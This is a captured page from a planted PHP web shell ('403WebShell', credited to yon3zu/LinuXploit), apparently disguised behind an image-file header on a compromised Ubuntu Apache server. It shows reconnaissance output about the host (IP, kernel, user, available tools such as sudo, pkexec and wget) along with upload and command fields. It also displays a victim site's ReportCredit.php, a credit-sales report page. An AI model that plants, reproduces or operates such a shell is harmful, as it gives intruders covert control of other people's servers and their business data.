����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 216.73.216.206
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/proc/thread-self/root/var/www/html/muebles/application/sales/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/thread-self/root/var/www/html/muebles/application/sales//ReportCredit.php

	<?php 
$titlepage="Reporte Creditos";
$idsmenu=2;
include "../../library/config.php";
require_once("../model/dbconn.php");
require_once("../model/pos.php");
include "../layout/top-header.php"; 
include "../../library/check_login.php";
include "../../library/check_access.php";
date_default_timezone_set("America/Mexico_City");
 
?> 
<link rel="stylesheet" href="../../dist/css/bootstrap-switch.min.css">
<link rel="stylesheet" href="../../plugins/datepicker/datepicker3.css">

<section class="content" name="formulario">
			<div class="box-header with-border">
						<div class="col-md-16">
							<div class="input-group ">
								<input type="text"  class="form-control" id="txtsearchitem_Credit"  placeholder="Buscar por Contrato...">
								<span class="input-group-btn ">
									<button type="submit" title="Buscar Por Nombre" class="btn btn-primary " id="btnbuscarNombre_Bitacora" name="btnbuscarNombre_Bitacora">
										<i class="fa  fa-search"></i>
									</button>
									
									
										<button type="submit" title="Imprimir Reporte" class="btn btn-primary" id="btn-search-report2" ><i class="fa fa-file-pdf-o"> Imprimir Reporte</i></button>				
									<a href="../master/v_item.php" title="Regresar A Modulo de Inventario" class="btn btn-warning" id="btnfinalizarOC" ><i class="fa fa-home"> Salir</i></a>
								</span>
							</div>
							<br>
						</div>
					<br>		
			</div>
	<div class="row">
		<div class="col-md-16">
			<div class="box box-primary">
				<div class="box-header with-border">
					<h3 class="bordercool">Ventas a Credito General  </h3>
					
					
								
								
					
				</div><!--./ box header-->
			    
				<div class="col-md-16">
					<div class="box-body">
					<div id="Oculto"></div>
						<div class="box-body table-responsive no-padding">
							<table id="table_credit" class="table  table-bordered table-hover ">
								<thead>
									<tr class="tableheader">
										<th style="width:40px">#</th>
										<th style="width:60px">sale_id</th>
										<th style="width:60px">Capturista</th>
										<th style="width:450px">contrato</th>
										<th style="width:125px">Cobrador(Ruta)</th>
										<th style="width:120px">Saldo</th>
										<th style="width:120px">1er Abono</th>
										<th style="width:60px">1er Abono %</th>
										<th style="width:20px">Fecha Venta</th>
										<th style="width:px"></th>
									</tr>
									
									
								</thead>
								<tbody></tbody>
							</table>

						</div>				
					</div><!-- /.box-body -->
				</div>
				
			</div><!-- /.box -->
		</div><!-- /.col-md-8 -->
		
	

</div><!-- /.row -->
</section><!-- /.content -->



<div id="modaleditparam2" class="modal fade ">
	<div class="modal-dialog modal-sm">
		<div class="modal-content">
			<div class="modal-header">
				<button type="button" class="close" data-dismiss="modal">×</button>
				<h4 class="modal-title">Precios</h4>
			</div><!--modal header--> 
			<div class="modal-body">
				<div class="form-horizontal">
					<div class="box-body">
						<div id="precios"></div>
						
						
						<input type="hidden" id="txtbarcode" >
						<input type="hidden" id="txtkey2">
						<input type="hidden" id="txtdataparam2">
						
						<div class="form-group">  
							<label class="col-sm-6  control-label">
								<button type="submit" class="btn btn-primary " id="btnubahedit2" >
									<i class="fa fa-edit"></i> Actualizar
								</button> 
								<span id="infoproses"></span>
							</label> 
							
						</div>
					</div>
				</div>
				<div class="modal-footer">
				<button type="button" class="btn btn-default" data-dismiss="modal">Cerrar</button>
			</div><!--modal footer-->
			</div>
			
		</div><!--modal-content-->
	</div><!--modal-dialog modal-lg-->
</div><!--modaleditparam-->


	
<?php include "../layout/footer.php"; //footer template ?> 
<?php include "../layout/bottom-footer.php"; //footer template ?> 
<script src="../../plugins/datepicker/bootstrap-datepicker.js"></script>
<script src="../../dist/js/redirect.js"></script>
<script src="j_pos.js"></script>

<script type="text/javascript">

			$('#table_credit').DataTable({
				"paging": true,
				"lengthChange": false,
				"searching": false,
				"processing": true,
				"ordering": false,
				"info": false,
				"responsive": true,
				"autoWidth": false,
				"pageLength": 100,
				"dom": '<"top"f>rtip',
				"fnDrawCallback": function( oSettings ) {
				},
				"ajax": {
					"url": "c_pos.php",
					"type": "POST",
					"data" : {
						method : "list_credit"
					},
					error: function (request, textStatus, errorThrown) {
						swal(request.responseJSON.message);
					}
				},

				columns: [
				{ "data": null,render :  function ( data, type, full, meta ) {
					return  meta.row + 1;
				}},
				{ "data": "sale_id" },
				{ "data": "id_user" },
				{ "data": "id_client" },
				{ "data": "id_collector" },
				{ "data": "total" },
				{ "data": "disc_rp" },
				{ "data": "disc_prcn" },
				{ "data": "sale_date" },
				{ "data": null, render : function(data,type,row){
					return "<button title='Editar' class='btn btn-edit btn-warning btn-xs'><i class='fa fa-desktop'></i> Detalles</button>  <button title='borrar' class='btn btn-hapus  btn-info btn-xs'><i class='fa fa-bank'></i> Abonos</button> ";
				} 		},
				]
			});
   
</script>
</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit